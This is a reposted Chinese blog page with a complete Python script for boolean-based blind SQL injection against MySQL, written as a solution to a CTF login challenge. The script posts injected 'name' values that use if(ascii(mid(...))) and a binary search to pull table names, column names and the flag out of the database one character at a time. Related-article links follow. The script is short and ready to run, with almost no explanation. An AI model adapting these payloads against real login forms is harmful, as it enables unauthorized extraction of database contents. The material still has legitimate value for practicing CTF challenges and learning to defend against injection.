SQL盲注脚本（MySQL）

Posted 2021-12-12 rongyongfeikai2

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了SQL盲注脚本（MySQL）相关的知识，希望对你有一定的参考价值。

#coding:utf-8
import urllib.request
import json

"""
SQL盲注脚本，适用于mysql数据库；CTF 0~1 SQL注入第二题
"""

class SqlBlindInjection(object):
    def __init__(self):
        self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php"
        #条件为真的返回值
        self.TRUERTN = u"\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef"
        #条件为假时的返回值
        self.FALSERTN = u"\\u8d26\\u53f7\\u4e0d\\u5b58\\u5728"
        #猜测位数
        self.GUESSNUM = 128
        #头部
        self.headers = {'Accept-Charset': 'utf-8', 'Content-Type': 'application/x-www-form-urlencoded'}

    def post(self, url, data):
        """
        发送post请求
        True:条件为真
        False:条件为假
        """
        req = urllib.request.Request(url=url, data=data.encode(), headers=self.headers, method='POST')
        response = urllib.request.urlopen(req).read()
        try:
            json_rtn = json.loads(response)
            if json_rtn["msg"] == self.TRUERTN:
                return True 
            elif json_rtn["msg"] == self.FALSERTN:
                return False
        except Exception as e:
            return self.post(url, data)

    def binary_search(self, url, data):
        """
        二分查找猜测
        """
        rtn = ""
        for i in range(1, self.GUESSNUM):
            #ascii可打印字符32~127
            start = 32
            end = 128
            mid = (start+end)//2
            while start < end:
                cdata = data%(i,mid,)
                if self.post(self.url, cdata):
                    start = mid + 1
                else:
                    end = mid
                mid = (start+end)//2
            if mid == 32:
                break
            rtn += chr(mid)
            print(rtn)
        return rtn 

    def guess_table(self):
        """
        猜测表名
        """ 
        data = "name=admin' and if(ascii(mid((Select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)#&pass=1"
        table_name = self.binary_search(self.url, data)
        print(table_name)

    def guess_cols(self):
        """
        猜测列名
        """ 
        data = "name=admin' and if(ascii(mid((Select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),%d,1))>%d,1,0)#&pass=1"
        col_name = self.binary_search(self.url, data)
        print(col_name)

    def get_flag(self):
        """
        获得flag
        """
        data = "name=admin' and if(ascii(mid((Select flag from fl4g),%d,1))>%d,1,0)#&pass=1"
        flag = self.binary_search(self.url, data)
        print(flag)

if __name__ == '__main__':
    sql_blind_inection = SqlBlindInjection()
    #fl4g
    #sql_blind_inection.guess_table()
    #flag
    #sql_blind_inection.guess_cols()
    print(sql_blind_inection.get_flag())

以上是关于SQL盲注脚本（MySQL）的主要内容，如果未能解决你的问题，请参考以下文章

SQL盲注脚本（MySQL）

SQL注入漏洞扫描工具都有哪些

盲注系列sql盲注之时间盲注(附自动化脚本)-系列终篇

解决SQL盲注和跨站脚本攻击

sql盲注之报错注入(附自动化脚本)

SQL注入盲注布尔类型脚本